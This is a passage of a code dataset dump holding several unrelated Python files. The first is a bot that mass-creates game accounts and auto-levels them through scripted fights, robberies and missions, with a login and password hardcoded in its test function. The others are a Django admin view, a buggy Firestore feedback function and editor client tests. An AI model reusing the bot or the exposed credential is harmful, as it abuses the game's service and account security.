= swin + lwin + kwin\n\t\t# Высчитываем фактор победы\n\t\tif wcount <= 3:\n\t\t\tprint('lose because wcount ==', wcount)\n\t\t\treturn 'lose'\n\t\t\t#Это поражение\n\t\telif wcount == 5:\n\t\t\treturn 'lose'\n\t\t\t#Это поражение\n\t\telif wcount == 4:\n\t\t\t#Ты сильнее его и ловчее\n\t\t\treturn 'strength-dexterity'\n\t\telif wcount == 6:\n\t\t\t#Ты сильнее и критичнее\n\t\t\treturn 'strength-critical'\n\t\telif wcount == 8:\n\t\t\t#Ты ловчее и критичнее\n\t\t\treturn 'dexterity-critical'\n\t\telif wcount == 9:\n\t\t\treturn 'ALL'\n\n\n\tdef refreshIfDummy(soup):\n\t\tisDummyPage = isDummy(soup)\n\t\tif isDummyPage:\n\t\t\t#time.sleep(2)\n\t\t\tcheckRival(0)\n\t\telse:\n\t\t\tprint('ВНИМАНИЕ, ЧТО ТО НЕ СРАБОТАЛО И ЭТО НЕ ИЗ-ЗА ЗАГЛУШКИ')\n\n\tdef changeEnemy(soup):\n\t\tchangeEnemyButton = soup.find('a', attrs={'class': 'bttn_sea'})\n\t\tif changeEnemyButton:\n\t\t\tchangeUrl = url + changeEnemyButton['href']\n\t\t\tnextStep = getSoup(changeUrl)\n\t\t\tcheckRival(nextStep)\n\t\telse:\n\t\t\trefreshIfDummy(soup)\n\n\tdef newEnemy(soup):\n\t\tglobal currentFightsCount\n\t\tcurrentFightsCount = currentFightsCount + 1 \n\t\tnewEnemyButton = soup.find('a', attrs={'class': 'bttn_green long mt5'})\n\t\tif newEnemyButton:\n\t\t\tchangeUrl = url + newEnemyButton['href']\n\t\t\tnextStep = getSoup(changeUrl)\n\t\t\tcheckRival(nextStep)\n\t\telse:\n\t\t\trefreshIfDummy(soup)\n\n\tdef getTokenToHit(soup):\n\t\thitButton = soup.find('a', attrs={'class': 'square-btn-green'})\n\t\tif hitButton:\n\t\t\ttoken = hitButton['href'].split('&token=')[1]\n\t\t\treturn token\n\t\telse:\n\t\t\trefreshIfDummy(soup)\n\n\n\tdef determineDisabledButton(soup):\n\t\tdisabledButton = soup.find('span', attrs={'class': 'square-btn-gray'})\n\t\tif disabledButton:\n\t\t\treturn disabledButton.find('img')['src'].split('hit/')[1].split('.')[0]\n\t\telse:\n\t\t\treturn None\n\n\tdef hitByType(hitType, token):\n\t\thitUrl = toHitUrl + hitType + '&token='+token\n\t\tsoup = getSoup(hitUrl)\n\t\tprint('Ударил использовав: ', hitTypesLables[hitType])\n\t\tcheckRival(soup)\n\n\n\tdef hit(winFactor, token, disabledButton):\n\t\tif winFactor == 'ALL':\n\t\t\tfor hitType in hitTypes:\n\t\t\t\tif hitType != disabledButton:\n\t\t\t\t\thitByType(hitType,token)\n\t\t\t\t\tbreak\n\t\telse:\n\t\t\tcurrentHitTypes = winFactor.split('-')\n\t\t\tfor hitType in hitTypes:\n\t\t\t\tif hitType != disabledButton:\n\t\t\t\t\thitByType(hitType,token)\n\t\t\t\t\tbreak\n\n\n\n\t\t\t\n\t\t\t\n\t\t\n\n\tdef continueTheFight(soup):\n\t\tstats = parseStats(soup)\n\t\twinFactor = determineHowToHit(stats)\n\t\tif winFactor == 'lose':\n\t\t\tprint('Сменим противника, потому что он сильнее')\n\t\t\tchangeEnemy(soup)\n\t\telse:\n\t\t\tdisabledButton = determineDisabledButton(soup)\n\t\t\ttoken = getTokenToHit(soup)\n\t\t\tif token:\n\t\t\t\thit(winFactor, token, disabledButton)\n\n\tdef checkRival(soup):\n\t\tglobal currentFightsCount\n\t\tprintWithLevel('Проведено боев: {0}/{1}'.format(currentFightsCount,needFightsCount))\n\t\tif currentFightsCount >= needFightsCount:\n\t\t\treturn 'enough'\n\t\tif soup == 0:\n\t\t\trivalSoup = getSoup(rivalUrl)\n\t\telse:\n\t\t\trivalSoup = soup\n\n\t\tfightStatus = getFightStatus(rivalSoup)\n\t\tenemyType = getEnemyType(rivalSoup)\n\t\treplenishEnergy(rivalSoup)\n\t\tisNeedType = (enemyType == needEnemyType) or (needEnemyType == 'all')\n\t\tif fightStatus == 'now' and isNeedType:\n\t\t\tcontinueTheFight(rivalSoup)\n\t\telif enemyType == 'noEnemy':\n\t\t\tcurrentFightsCount = currentFightsCount + 1 \n\t\t\tsoup = getSoup(startFightUrl)\n\t\t\tcheckRival(soup)\n\t\telif fightStatus == 'ended':\n\t\t\twaitHalfSecond()\n\t\t\tnewEnemy(rivalSoup)\t\n\t\telse:\n\t\t\twaitHalfSecond()\n\t\t\tchangeEnemy(rivalSoup)\n\t\t\t\n\t\t\n\tdef getEnemyType(soup):\n\t\tfightBack = soup.find('div', attrs={'class': 'fight-back'})\n\t\tif fightBack:\n\t\t\tenemyType = fightBack['style'].split('bgs/')[1].split('/')[0]\n\t\t\tprint('Это {0}.'.format(enemyTypes[enemyType]))\n\t\t\treturn enemyType\n\t\telse:\n\t\t\treturn 'noEnemy'\n\n\tdef isDummy(soup):\n\t\trefresh = soup.find('a', attrs={'class': 'btn-a t-c mt5'})\n\t\tif refresh:\n\t\t\tisDummyPage = refresh.get_text().strip() == 'Обновить'\n\t\t\tif isDummyPage:\n\t\t\t\tprint('Харе так бешанно :)')\n\t\t\treturn isDummyPage\n\t\telse:\n\t\t\treturn False\n\twhile True:\n\t\tresult = checkRival(0)\n\t\tif result == 'enough':\n\t\t\tprintWithLevel('Закончили бои, их было: '+str(currentFightsCount))\n\t\t\tcurrentFightsCount = 0\n\t\t\tbreak\n\n\n\ndef waitNextLevel(needLevel):\n\twhile True:\n\t\tcheckLevel()\n\t\tif myLevel >= needLevel:\n\t\t\tprint('Апнули левел на: ', myLevel)\n\t\t\treturn True\n\t\telse:\n\t\t\tharvestAllEachOne()\n\t\t\tgetAwards(2)\n\t\t\t#time.sleep(30)\n\t\t\tpass\n\n\ndef add_params(need_equipments):\n\n\tfor equipment_id in need_equipments:\n\t\tuser.get(url + '/?r=fights/equipments&equipment_id='+equipment_id)\n\t\twaitHalfSecond()\n\tpass\n\n\ndef getAndReturnСhain(itemName):\n\tuser.get(url + '/index.php?r=property/add&id='+itemName)\n\twaitHalfSecond()\n\tchainPage = user.get(url + '/index.php?r=property/list&top=clothes&cat=chain')\n\twaitHalfSecond()\n\ttry:\n\t\tsoup = bs(chainPage.content, 'html.parser')\n\t\tchain_cancel_url = soup.find('a', attrs = {'class':'bttn_red'})['href']\n\t\tchain_cancel = user.get(url+chain_cancel_url)\n\t\tchain_cancel = user.get(url+chain_cancel_url)\n\texcept:\n\t\tprint('NO!')\n\tprint('купили и вернули')\n\ndef get_card():\n\ttry:\n\t\tpvp = user.get(url + '/index.php?r=cards/cards')\n\t\tsoup = bs(pvp.content, \"lxml\")\n\t\tinf_one = soup.find_all('a', attrs={'class': 'card'})\n\t\tinf_two = inf_one[0]\n\t\tglobal url_take_card\n\t\turl_take_card = inf_two['href']\n\t\treturn True\n\texcept:\n\t\tprint('Карзино заперто.')\n\t\treturn False\n\n\n\ndef take_card():\n\tprint('Берем карту')\n\tcard = get_card()\n\tif card:\n\t\tcc = str(url+url_take_card)\n\t\tprint(cc)\n\t\ttakecard = user.get(cc)\n\t\tprint('Взяли карту')\n\telse:\n\t\tprint('Нет карты')\n\ndef takefuckingoffice():\n\tharvestAllEachOne()\n\t#time.sleep(5)\n\tuser.get(url + '/?r=estate')\n\tprintWithLevel('Жду 2 секунды в офисе')\n\t#time.sleep(2)\n\tuser.get(url + '/index.php?r=estate/shoplist&slot=0')\n\tprintWithLevel('Жду 2 секунды в офисе')\n\t#time.sleep(2)\n\tuser.get(url + '/index.php?r=estate/shopview&slot=0&type=office')\n\tprintWithLevel('Жду 2 секунды в офисе')\n\t#time.sleep(1)\n\tuser.get(url + '/index.php?r=estate/estatebuy&slot=0&type=office')\n\tprintWithLevel('Жду 2 секунды в офисе')\n\t#time.sleep(2)\n\tuser.get(url + '/index.php?r=estate/estatebuy&slot=3&type=office')\n\tprintWithLevel('Жду 2 секунды в офисе')\n\t#time.sleep(2)\n\tharvestAllEachOne()\n\tpass\n\n\ndef mission2():\n\tcheckLevel()\n\tprintStartMission(2)\n\tgetDotsId()\n\tdots = myDots[2:]\n\tfor id_c in dots:\n\t\tprintWithLevel('Ставим беляшную Гаф-Гаф')\n\t\taddDot('bone_setter',id_c)\n\t\twaitHalfSecond()\n\tprintWithLevel('Нужно подождать 30 сек до созревания точек')\n\ttime.sleep(30)\n\tharvestAllEachOne()\n\tgetAwards(2)\n\twaitHalfSecond()\n\tgetAwards(2)\n\tsetFunnyDescription()\n\ndef mission3():\n\tcheckLevel()\n\tprintStartMission(3)\n\tprintWithLevel('Нужно сделать 4 боя, сбор точек, поставить гаф гаф')\n\tfights(4)\n\tprintWithLevel('Заберем награду за 4 боя.')\n\tgetAwards(2)\n\twaitHalfSecond()\n\tgetAwards(2)\n\tprintWithLevel('Ставим гафгаф')\n\tgetDotsId()\n\tremoveDot(myDots[4])\n\tprintWithLevel('Ставим snack_bar')\n\taddDot('snack_bar',myDots[4])\n\t#time.sleep(1)\n\tprintWithLevel('забираем награду')\n\tgetAwards(2)\n\twaitNextLevel(4)\n\n\ndef mission4():\n\twaitHalfSecond()\n\tcheckLevel()\n\tprintStartMission(4)\n\tupgrade_stats()\n\tuser.get(url + '/index.php?r=fights/equipments&equipment_id=bita')\n\twaitHalfSecond()\n\tprintWithLevel('Бежим за цепурой')\n\tgetAndReturnСhain('first_chain')\n\twaitNextLevel(5)\n\ndef mission5():\n\tcheckLevel()\n\tprintStartMission(5)\n\tprintWithLevel('5 боев, 5 точек и 3 грабежа!')\n\tprintWithLevel('надо попробовать грабануть')\n\trobs(3)\n\tprintWithLevel('Ожидание 30 секунд')\n\ttime.sleep(30)\n\tfights(5)\n\tprintWithLevel('Ожидание 20 секунд')\n\ttime.sleep(20)\n\tprintWithLevel('дальше только точки')\n\twaitNextLevel(6)\n\ndef mission6():\n\twaitHalfSecond()\n\tcheckLevel()\n\tprintStartMission(6)\n\tprintWithLevel('тут нам надо набить авторитету, сходить в гоп-стоп и поставить столовку хавчик')\n\tprintWithLevel('начнем с хавчика')\n\tgetDotsId()\n\tdots = myDots[2:]\n\tidc = 0\n\tfor id_c in dots:\n\t\tidc = idc + 1;\n\t\tif idc == 3:\n\t\t\tprintWithLevel('Сюда ставим!')\n\t\t\tremoveDot(id_c)\n\t\t\taddDot('dining',id_c)\n\t\telse:\n\t\t\tpass\n\tprintWithLevel('что-ж пора улучшить параметры!')\n\tprint('теперь ты непобедим! (среди бомжей)')\n\tgetAwards(2)\n\tprintWithLevel('пока пособираем точки где то 200 сек')\n\tfor i in range(8):\n\t\tharvestAllEachOne()\n\t\tprint('ждем 35 сек')\n\t\ttime.sleep(31)\n\tprintWithLevel('и 12 боев надо, шоб наверняка')\n\tfights(12)\n\tprintWithLevel('пошли забирать награду!')\n\tgetAwards(4)\n\t#time.sleep(1)\n\tgetAwards(4)\n\tuser.get(url + '/index.php?r=property/add&id=first_rosary')\n\t#time.sleep(2)\n\twaitNextLevel(7)\n\ndef mission7():\n\twaitHalfSecond()\n\tcheckLevel()\n\tprintStartMission(7)\n\tupgrade_stats()\n\tupgrade_stats()\n\tprintWithLevel('Не больше 5 грабежей')\n\trobs(5)\n\tfor x in range(12):\n\t\tprintWithLevel('Точки соберу')\n\t\tharvestAllEachOne()\n\t\t#time.sleep(10)\n\n\tprintWithLevel('казино, 1 место под точку, 2 подполки, олимпийка, барыга, 5 точек, 7 боев, и все!')\n\tprintWithLevel('сразу начнем с покупки точки!')\n\tuser.get(url + '/index.php?r=crop/addslot&type=slow')\n\twaitHalfSecond()\n\tuser.get(url + '/?r=pusher')\n\tgetAwards(1)\n\tprint('+1 доц за барыгу')\n\ttake_card()\n\tprintWithLevel('забрали финку, надо его надеть.')\n\tuser.get(url + '/index.php?r=property/list&top=clothes&cat=weapon')\n\twaitHalfSecond()\n\tprintWithLevel('5 раз сходим за вещями')\n\tfor i in range(5):\n\t\tuser.get(url + '/index.php?r=property/add&id=sharpening')\n\t\tprintWithLevel('купим олимпийку')\n\t\twaitHalfSecond()\n\t\tuser.get(url + '/index.php?r=property/add&id=sweatshirts')\n\t\tprintWithLevel('забираем награду')\n\tgetAwards(2)\n\twaitHalfSecond()\n\tharvestAllEachOne() #сбор точек всех\n\tgetAwards(1)\n\t#time.sleep(5)\n\tgetDotsId()\n\tdots = myDots[2:]\n\tfor id_c in dots:\n\t\tremoveDot(id_c)\n\t\tprintWithLevel('Ставим карточный клуб')\n\t\taddDot('card_club',id_c)\n\twaitHalfSecond()\n\tprintWithLevel('подполки поставил!')\n\tprintWithLevel('бои даже стараться не буду делать, лучше левел апнуть')\n\tgetAwards(2)\n\t#time.sleep(1)\n\tgetAwards(2)\n\twaitNextLevel(8)\n\n\ndef mission8():\n\twaitHalfSecond()\n\tcheckLevel()\n\tprintStartMission(8)\n\tuser.get(url + '/index.php?r=fights/params¶m_id=strength')\n\twaitHalfSecond()\n\tuser.get(url + '/index.php?r=fights/params¶m_id=critical')\n\twaitHalfSecond()\n\tupgrade_stats()\n\tupgrade_stats()\n\tprintWithLevel('тут офис, 6 точек, 5 боев и 8 грабежей')\n\tfor i in range(5):\n\t\ttakefuckingoffice()\n\tprint('Офис на месте!')\n\tgetAwards(1)\n\tprintWithLevel('8 грабежей не просто сделать, так что тупо буду собирать точки')\n\t#time.sleep(30)\n\tharvestAllEachOne()\n\tgetAwards(1)\n\twaitNextLevel(9)\n\n\n\ndef mission9():\n\twaitHalfSecond()\n\tcheckLevel()\n\tprintStartMission(9)\n\tupgrade_stats()\n\tprintWithLevel('тут у нас: 2 летника, 1 ускорение, сбор с 8 точек и 8 грабежей')\n\tharvestAllEachOne() #сбор точек всех\n\tgetAwards(1)\n\tprint('два летника ставим!')\n\tgetDotsId()\n\tdots = myDots[2:4]\n\tfor id_c in dots:\n\t\tremoveDot(id_c)\n\t\tprint('Ставим летники')\n\t\taddDot('outdoor_cafe',id_c)\n\tprintWithLevel('летники поставил!')\n\t#time.sleep(5)\n\tgetAwards(1)\n\tprintWithLevel('надо че нить ускорить!')\n\tgetDotsId()\n\tdots = myDots[2:]\n\tidc = 0\n\tfor id_c in dots:\n\t\tidc = idc + 1;\n\t\tif idc == 3:\n\t\t\tprintWithLevel('эту ускорим!')\n\t\t\tboostDot(id_c)\n\t\t\t#time.sleep(0.3)\n\t\telse:\n\t\t\tpass\n\t#time.sleep(2)\n\tharvestAllEachOne()\n\tgetAwards(2)\n\tprintWithLevel('уже должны апнуть 10ку!')\n\twaitNextLevel(10)\n\n\ndef writeToGoodFile(nick):\n\twith open('combinat_result.txt', 'a', encoding=\"utf8\") as mf:\n\t\tmf.write(str(nick)+'\\n')\n\tpass\n\ndef misses():\n\tmission2()\n\tmission3()\n\tmission4()\n\tmission5()\n\tmission6()\n\tmission7()\n\tmission8()\n\tmission9()\n\tgotoband()\n\twriteToGoodFile(newMult)\n\n\ndef main():\n\tglobal user\n\tprint('Привет, я создаю быстрых мультов из списка')\n\n\tfor nick in listOfMuls:\n\t\tnewAccount(nick)\n\t\tmisses()\n\t\tprint('Закончили с ', nick)\n\t\ttry:\n\t\t\tuser = requests.Session()\n\t\t\tuser.close()\n\t\texcept:\n\t\t\tpass\n\n\ndef test():\n\tlogin('hg6jytras781','22rafaelka23')\n\trobs(3)\n\nif __name__ == '__main__':\n\tmain()","repo_name":"quintbrut/safe","sub_path":"multcreate.py","file_name":"multcreate.py","file_ext":"py","file_size_in_byte":34273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11462916989","text":"from django.http import HttpRequest, HttpResponse, HttpResponseRedirect\r\nfrom django.shortcuts import render, reverse\r\nfrom mainapp.models import Stuff\r\nfrom adminapp.models.product import ProductEdit\r\n\r\ndef index(request:HttpRequest):\r\n models = Stuff.objects.all()\r\n return render(request,'adminapp/products/index.html', {'models': models})\r\n\r\ndef create(request:HttpRequest):\r\n return HttpResponse('create')\r\n\r\ndef read(request:HttpRequest,id):\r\n stuff = Stuff.objects.get(id=id)\r\n category = stuff.category\r\n return render(request, 'adminapp/products/read.html', {'stuff': stuff,'category':category})\r\n\r\ndef update(request:HttpRequest,id):\r\n title = Stuff.objects.get(pk=id)\r\n if request.method == 'POST':\r\n update_form = ProductEdit(request.POST, instance=title)\r\n if update_form.is_valid():\r\n update_form.save()\r\n return HttpResponseRedirect(reverse('adminapp:categories'))\r\n else:\r\n update_form = ProductEdit(instance=request.user)\r\n content = {\r\n 'title': title,\r\n 'update_form': update_form,\r\n }\r\n return render(request, 'adminapp/categories/update.html', content)\r\n\r\ndef delete(request:HttpRequest,id):\r\n title = Stuff.objects.get(pk=id)\r\n title.delete()\r\n return HttpResponseRedirect(reverse('adminapp:products'))\r\n\r\ndef list_by_category(request:HttpRequest,category):\r\n return HttpResponse('list')\r\n","repo_name":"kirosx/GB-Django1","sub_path":"adminapp/views/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33013015486","text":"from google.cloud import firestore\nfrom flask import jsonify\n\ndef feedbackSummation(requests):\n collection_name = 'UserFeedback'\n \n headers = {\n 'Access-Control-Allow-Methods': 'POST',\n 'Access-Control-Allow-Origin': '*'\n }\n feedback_response = getFireStoreData(collection_name)\n \n return (jsonify(feedback_response),200,headers)\n\n\ndef getFireStoreData(collection_name):\n \n db = firestore.Client()\n user_feedbacks = db.collection(collection_name).stream()\n total_records = 0\n polarity_score = 0\n for feedback in user_feedbacks:\n total_records = total_records + 1\n database_feedback_dict = feedback.to_dict()\n polarity_score = polarity_score + database_feedback_dict['polarity_score']\n positive_feedback_percentage = (sum / total_records) * 100\n return {\"positive_feedback\": positive_feedback_percentage}","repo_name":"AbhishekPethani/CSCI_5410_Serverless_Data_Processing","sub_path":"backend/machine_learning/Feedback Analysis/Feedback_Summarized_Analysis.py","file_name":"Feedback_Summarized_Analysis.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"28609496162","text":"# basic functionality tests for client side\n\nimport os\nimport sys\nfrom unittest import TestCase\nimport subprocess\nimport time\nfrom Queue import Empty\n\nsys.path.insert(0, os.path.abspath('../src/'))\n\nfrom sessions.client.main import *\n\n\"\"\"@type subproc: subprocess\"\"\"\nsubproc = None\n\nlogging.disable(logging.CRITICAL)\n\n\n# Helper class for creating args similar as given to main class\nclass Bunch:\n def __init__(self, **kwds):\n self.__dict__.update(kwds)\n\n\nclass ClientTests(TestCase):\n\n def setUp(self):\n #Setting up args\n args = Bunch(port=DEFAULT_SERVER_PORT, listenport=DEFAULT_SERVER_PORT, host=DEFAULT_SERVER_INET_ADDR)\n\n # Start server as subprocess\n global subproc\n subproc = subprocess.Popen([\"python\", \"../src/editor_server.py\"], shell=False)\n # client server variable set up\n initialize(args)\n\n\n # Test file creating, new file, file with same name\n def test_file_creating(self):\n # Creating new file\n status = create_file('user1', 'file1')\n self.assertEqual(status, \"\") # Should only return empty err\n # Create file that already exists.\n status = create_file('user1', 'file1')\n self.assertEqual(status, \"File file1 already exists\") # Should return given error\n\n\n # Test file opening, whether such file exists, accessing unauthorized file\n def test_file_opening(self):\n create_file('user1', 'file1')\n # Normal file opening\n status, _, _ = open_file('user1', 'file1')\n self.assertEqual(status, \"\") # Meaning no error\n # Unauthorized file opening\n status, _, _ = open_file('user2', 'file1')\n self.assertEqual(status, \"Don't have rights to access file1\")\n # Opening non-existing file\n status, _, _ = open_file('user1', 'file2')\n self.assertEqual(status, \"This file does not exsist.\")\n\n # Stop edits listening thread properly\n stop_listening()\n\n\n # Test editor (user) adding - adding twice, add owner as editor\n def test_editor_adding(self):\n create_file('user1', 'file1')\n #Add editor (user) normally)\n status = add_editor('user1', 'file1', 'user2')\n self.assertEqual(status, \"\")\n #Add same editor twice\n status = add_editor('user1', 'file1', 'user2') # Throws no error\n self.assertEqual(status, \"\")\n #Add owner as editor (user)\n status = add_editor('user1', 'file1', 'user1') # TODO one can add himself as user\n #self.assertEqual(status, \"Cannot add owner as user\")\n #Add editor to available file (file that user does not own)\n status = add_editor('user2', 'file1', 'user3')\n self.assertEqual(status, \"Must be owner to change editors\")\n\n\n # Editor deleting - delete owner, delete editor twice\n def test_editor_removing(self):\n create_file('user1', 'file1')\n add_editor('user1', 'file1', 'user2')\n # Remove editor normally\n status = remove_editor('user1', 'file1', 'user2')\n self.assertEqual(status, \"\")\n # Remove editor second time\n status = remove_editor('user1', 'file1', 'user2') # No error thrown\n self.assertEqual(status, \"\")\n # Try to remove owner non-existing user from editors\n status = remove_editor('user1', 'file1', 'nonexist') # No error thrown\n self.assertEqual(status, \"\")\n # Try to remove user for available file (file that user does not own\n status = remove_editor('user2', 'file1', 'user1')\n self.assertEqual(status, \"Must be owner to change editors\")\n\n # Test file listing for different scenarios\n def test_file_listing(self):\n create_file('user1', 'file1')\n create_file('user1', 'file2')\n create_file('user2', 'file3')\n add_editor('user2', 'file3', 'user1')\n #List files for user1\n status, owned, available = get_files('user1')\n self.assertEqual(status, \"\")\n self.assertItemsEqual(owned, ['file1', 'file2'])\n self.assertItemsEqual(available, ['file3'])\n #List files for user2\n status, owned, available = get_files('user2')\n self.assertEqual(status, \"\")\n self.assertItemsEqual(owned, ['file3'])\n self.assertItemsEqual(available, [])\n #List files for new user\n status, owned, available = get_files('newuser')\n self.assertEqual(status, \"\")\n self.assertItemsEqual(owned, [])\n self.assertItemsEqual(available, [])\n\n # Test locking rows\n def test_locks(self):\n status = create_file('user1', 'file1')\n status = add_editor('user1', 'file1', 'user2')\n\n #Normal locking\n status, lock = lock_line('user1', 'file1', 1)\n self.assertEqual(status, \"\")\n self.assertTrue(lock)\n #Lock same row twice\n status, lock = lock_line('user1', 'file1', 1)\n self.assertEqual(status, \"\")\n self.assertTrue(lock)\n # Try to lock line, which is already locked\n status, lock = lock_line('user2', 'file1', 1)\n self.assertFalse(lock)\n #Try to lock line of non-existing file\n status, lock = lock_line('user1', 'non_exist', 1)\n self.assertEqual(status, \"This file does not exsist.\")\n #Try to lock line of non-existing line\n status, lock = lock_line('user1', 'file1', 5)\n self.assertEqual(status, \"\")\n self.assertTrue(lock)\n #Try to lock line of not available file\n status, lock = lock_line('user3', 'file1', 1)\n self.assertEqual(status, \"Don't have rights to access file1\")\n #Check if previously locked line is released and new line locked\n status, lock = lock_line('user1', 'file1', 2)\n self.assertTrue(lock)\n status, lock = lock_line('user2', 'file1', 1)\n self.assertTrue(lock)\n\n # Test editor (user) listing\n def test_get_editors(self):\n status = create_file('user1', 'file1')\n add_editor('user1', 'file1', 'user2')\n add_editor('user1', 'file1', 'user3')\n #Get editors normally\n status, editors = get_editors('user1', 'file1')\n self.assertEqual(status, \"\")\n self.assertItemsEqual(editors, ['user2', 'user3'])\n #Get editors of not-existing file\n status, _ = get_editors('user1', 'nonexist')\n self.assertEqual(status, \"This file does not exsist.\")\n #Get editor with not-allowed user\n status, _ = get_editors('user2', 'file1')\n self.assertEqual(status, \"Must be owner to see editors\")\n\n # Test sending line changes\n def test_edit_line(self):\n create_file('user1', 'file1')\n lock_line('user1', 'file1', 1)\n\n # Normal line edit send\n status = send_new_edit('user1', 'file1', 1, 'new line!')\n time.sleep(0.5) # to assure that edit is handled by server\n self.assertEqual(status, \"\")\n status, content, _ = open_file('user1', 'file1')\n self.assertEqual(content, \"new line!\\n\")\n # Normal new line send\n status = send_new_edit('user1', 'file1', 2, 'new line!', True)\n time.sleep(0.5) # to assure that edit is handled by server\n self.assertEqual(status, \"\")\n status, content, _ = open_file('user1', 'file1')\n #print \"DEBUG content: \" + content\n\n self.assertEqual(content, \"new line!\\nnew line!\\n\")\n # Sending edit to line that is not locked\n status = send_new_edit('user1', 'file1', 2, 'new line!')\n self.assertEqual(status, \"Don't have lock on line 2\")\n # Sending line to non-existing file\n status = send_new_edit('user1', 'not_exist', 1, 'new line!')\n self.assertEqual(status, \"This file does not exsist.\")\n # Sending line to non-existing line number\n status = send_new_edit('user1', 'file1', -1, 'new line!')\n self.assertEqual(status, \"Don't have lock on line -1\")\n # Sending line to not available file\n status = send_new_edit('user2', 'file1', 1, 'new line!')\n self.assertEqual(status, \"Don't have rights to access file1\")\n # Sending symbols to file\n lock_line('user1', 'file1', 2)\n status = send_new_edit('user1', 'file1', 2, \"@${[]}#%&/()=?'~><\")\n self.assertEqual(status, \"\")\n time.sleep(0.5) # to assure that edit is handled by server\n status, content, _ = open_file('user1', 'file1')\n #print \"content: \" + content\n self.assertEqual(content, \"new line!\\n@${[]}#%&/()=?'~><\\n\")\n stop_listening()\n\n\n # Test line deleting\n def test_delete_line(self):\n create_file('user1', 'file1')\n lock_line('user1', 'file1', 1)\n send_new_edit('user1', 'file1', 1, 'new line!')\n time.sleep(1) # to assure that edit is handled by server\n lock_line('user1', 'file1', 2) #previous line can't be locked by same user\n status = delete_line('user1', 'file1', 1)\n self.assertEqual(status, \"\")\n time.sleep(0.5) # to assure that edit is handled by server\n\n status, content, _ = open_file('user1', 'file1')\n self.assertEqual(content, \"\")\n stop_listening()\n\n # Deleting edit of a line that is not locked\n lock_line('user1', 'file1', 1)\n status = delete_line('user1', 'file1', 1)\n self.assertEqual(status, \"Don't have lock on line 1\")\n # Deleting line of non-existing file\n status = delete_line('user1', 'not_exist', 1)\n self.assertEqual(status, \"This file does not exsist.\")\n # Deleting line of non-existing line number\n status = delete_line('user1', 'file1', -1)\n self.assertEqual(status, \"\")\n # Deleting line of not available file\n status = delete_line('user2', 'file1', 0)\n self.assertEqual(status, \"Don't have rights to access file1\")\n\n # Test line receiving\n def test_line_receiving(self):\n\n create_file('user1', 'file1')\n add_editor('user1', 'file1', 'user2')\n status, content, queue = open_file('user2', 'file1')\n\n lock_line('user1', 'file1', 1)\n send_new_edit('user1', 'file1', 1, '1st line!')\n lock_line('user1', 'file1', 2)\n send_new_edit('user1', 'file1', 2, 'new line!', True)\n\n\n try:\n #First should get first line edit\n line_no, line_cont, is_new_line = queue.get(block=True, timeout=1)\n self.assertEqual(line_no, 1)\n self.assertEqual(line_cont, \"1st line!\\n\")\n self.assertEqual(is_new_line, False)\n #After that second line edit\n line_no, line_cont, is_new_line = queue.get(block=True, timeout=1)\n self.assertEqual(line_no, 2)\n self.assertEqual(line_cont, \"new line!\\n\")\n self.assertEqual(is_new_line, True)\n\n except Empty:\n self.fail(\"Did not receive any message from queue (during 1 sec)\")\n finally:\n stop_listening()\n\n\n def tearDown(self):\n\n #Clear old files\n folder = '../src/sessions/server/_files/'\n for the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n # shutdown server\n subproc.terminate()\n subproc.wait() #Wait until subproc is really terminated, otherwise may terminate next connection also\n","repo_name":"markus93/DSHomework1","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":11410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"34972279674","text":"import unittest\nfrom module import gff_file\n\n\nclass MyTestCase(unittest.TestCase):\n def test_read_gff_file(self):\n mini_gff_file = \"./input_files/mini.gff\"\n gene_organism = {\n \"9519cfca-0c42-44d4-ab09-d37d33245d07\": \"sand_box\",\n \"78fbaf52-0a8b-4acb-a93c-5d50238e47bf\": \"sand_box\",\n }\n\n mini_gff = gff_file.HandleGFF(mini_gff_file, gene_organism, \"\")\n mini_gff.read_gff_file()\n scaffold = mini_gff.fields[(\"scaffold\", \"9519cfca-0c42-44d4-ab09-d37d33245d07\")]\n self.assertEqual(scaffold, \"3R\")\n\n strand = mini_gff.fields[(\"strand\", \"14f85617-72a1-4658-8abc-05f94e551114\")]\n self.assertEqual(strand, \"+\")\n\n position = mini_gff.fields[\n (\"position\", \"26187b4d-cdb3-4263-a6af-a5556bfb5474_26\")\n ]\n self.assertEqual(position, (36675298, 36675597))\n\n gene_id = mini_gff.child_parent_relationship[\n \"5d7a93e5-6390-4568-832b-a5d7ca162ac6\"\n ]\n self.assertEqual(gene_id, \"9519cfca-0c42-44d4-ab09-d37d33245d07\")\n\n mrna_parent_id = mini_gff.child_parent_relationship[\n \"14f85617-72a1-4658-8abc-05f94e551114\"\n ]\n self.assertEqual(\"78fbaf52-0a8b-4acb-a93c-5d50238e47bf\", mrna_parent_id)\n\n cds_parent_id = mini_gff.child_parent_relationship[\n \"79cdd16a-3988-4d9a-81a6-e0a17384013c\"\n ]\n self.assertEqual(\"14f85617-72a1-4658-8abc-05f94e551114\", cds_parent_id)\n\n gene_id_2 = mini_gff.get_gene_id(\"79cdd16a-3988-4d9a-81a6-e0a17384013c\")\n self.assertEqual(\"78fbaf52-0a8b-4acb-a93c-5d50238e47bf\", gene_id_2)\n\n def test_scan_true_gff_for_errors(self):\n true_gff_file = \"./input_files/true.gff\"\n\n true_gene_organism = dict()\n\n with open(\"./input_files/two_gene_organism.tsv\") as file_handle:\n for line in file_handle:\n gene_id, organism = line.rstrip().split(\"\\t\")\n true_gene_organism[gene_id] = organism\n\n true_gff = gff_file.HandleGFF(true_gff_file, true_gene_organism, \"\")\n true_gff.read_gff_file()\n\n true_gff.scan_gff_for_errors()\n self.assertEqual(true_gff.errors, {})\n\n def test_scan_false_gff_for_errors(self):\n false_gff_file = \"./input_files/simple_false.gff\"\n\n false_gene_organism = dict()\n with open(\"./input_files/simple_organism.tsv\") as file_handle:\n for line in file_handle:\n gene_id, organism = line.rstrip().split(\"\\t\")\n false_gene_organism[gene_id] = organism\n\n false_gff = gff_file.HandleGFF(false_gff_file, false_gene_organism, 